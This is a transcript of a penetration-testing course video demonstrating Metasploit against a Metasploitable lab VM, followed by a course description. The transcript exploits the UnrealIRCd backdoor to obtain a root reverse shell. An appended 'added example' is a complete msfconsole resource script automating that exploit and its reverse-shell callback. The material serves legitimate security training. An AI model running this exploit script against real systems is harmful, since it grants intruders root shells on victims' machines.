Join Malcolm Shore for an in-depth discussion in this video, "A refresher on Metasploit," part of Penetration Testing Essential Training.
- [Instructor] When pentesting, it's useful to provide evidence that vulnerabilities are in fact exploitable. To do this, we can use Metasploit, which is here in the favorites menu. The first time Metasploit starts up, it will create and prepare its databases; otherwise it will skip this initialization step. After completing its startup, the msf prompt appears. Metasploit is now ready for use. Metasploit includes a database of testing modules; assembly and encoding capabilities to manipulate exploit and payload code; and the Meterpreter, a payload which provides a powerful remote shell.
We can see that it includes 1,673 exploits, 959 auxiliary modules, 294 post exploitation modules, and 489 payloads in its database. Exploit modules are run against a target system to check whether it's vulnerable. Payloads are sent to a target system to demonstrate the exploit was successful by executing on the target. The first Metasploit command I'll enter is help. This shows all the commands that we can issue in Metasploit.
The list starts with the Core Commands, and progresses down to Module Commands, Job Commands, Resource Script Commands, Database Backend Commands, and Credentials Backend Commands. I can issue the command show exploits which lists all the exploits in the Metasploit database. The exploit name appears at the left of this list, and at the right is the disclosure date, the effectiveness of the exploit, and the description of what the exploit achieves.
I can be more selective and use the search command. I'll type help search to see how to do this. Let's look for a Windows 8 exploit. I'll enter search win8. Here we can see the exploits listed for Windows 8. There's only one, the 2012 ikeext_service exploit. If I enter search win7, I get a lot more exploits listed, as well as a set of Windows 7 payloads.
Let's now use Metasploit to check whether a system is vulnerable. I'm going to try an exploit on my Metasploitable system, and I'll start by looking at its IRC service. Let's see what Metasploit has for us. Okay, I can see there's a range of exploits for DOS, Windows, UNIX and so on. I'll select the UNIX exploit called exploit unix irc unreal ircd 3281 backdoor. To do this I enter the command use with the exploit name.
Okay, we're now loaded. I can check the targets this exploit works against by entering the command show targets. In this case, the exploit can determine what kind of targets it has, so we can select Automatic. Let's set that target type. Let's have a look now at what payloads I can use with this exploit. I see that I have a number of command shells, and a Generic Command Execution. I'll use the info command to get more information on the Reverse shell.
Okay, so this doesn't need administrative privileges, and it creates a shell on port 4444. That sounds good. Let's go select it. I'll now see what options I need to set to use this combination of exploit and payload. I'll have to set the remote and local host addresses. The remote address is 10.0.2.8, the Metasploitable system. The local host, this Kali system, is 10.0.2.11.
Okay, let's run the exploit. We can see Metasploit establishing the sockets in the Telnet connection and finally confirming that a command shell has been established on the remote system. The first thing we'll do is check that this is the remote system. ifconfig displays the IP address 10.0.2.8, the remote system. Now let's check who we are on the remote system.
Okay, we're on the remote system as root. We can list the processes. Okay, I'll first Control-C and terminate the shell, and that concludes this short refresher on Metasploit.
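The walkthrough above is typed interactively, one command at a time. For a repeatable lab check, the same sequence can be captured in an msfconsole resource script. The script below is an added example, not part of the course or of Metasploit itself. It assumes the spoken module name corresponds to the path exploit/unix/irc/unreal_ircd_3281_backdoor, that the reverse command shell chosen in the video is cmd/unix/reverse, and that the host options are named RHOST and LHOST (newer Metasploit releases use RHOSTS in place of RHOST); the two lab addresses are the ones used in the video.

```text
# Added example: msfconsole resource script replaying the refresher walkthrough
# end to end against the Metasploitable lab VM. Run with:
#     msfconsole -q -r refresher.rc
# Assumptions not stated in the video: the module path, the payload name
# cmd/unix/reverse, and the option name RHOST (RHOSTS on newer releases).

# Load the exploit module selected in the video.
use exploit/unix/irc/unreal_ircd_3281_backdoor

# List targets; this module fingerprints the target itself, so 0 is "Automatic".
show targets
set TARGET 0

# Review compatible payloads, then read the details of the reverse shell
# (needs no administrative privileges; connects back on port 4444 by default).
show payloads
info payload/cmd/unix/reverse
set PAYLOAD cmd/unix/reverse

# Remote host is the Metasploitable lab VM, local host is the Kali VM,
# both addresses exactly as used in the video.
set RHOST 10.0.2.8
set LHOST 10.0.2.11
set LPORT 4444

# Confirm every required option is populated before launching.
show options

# Launch; on success msfconsole drops into the command shell session,
# where ifconfig and whoami confirm the remote host and the account.
exploit
```

Keeping the sequence in a resource script makes the evidence reproducible: the same module, payload and options are used on every run, and the script itself documents what was attempted against the lab host, which is what a pentest report needs to back a "confirmed exploitable" finding.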
Cybersecurity expert Malcolm Shore reviews popular pen testing tools, as well as the Bash and Python scripting skills required to be able to acquire, modify, and re-use exploit code. He also provides a refresher on Kali Linux and introduces techniques for testing web services. At the end of this course, you'll be prepared to take more advanced training, and to pursue the popular Offensive Security Certified Professional (OSCP) certification.
- Pen testing overview
- Pen testing tools
- Bash scripting
- Python scripting
- Kali and Metasploit
- Web testing
- Finding exploit code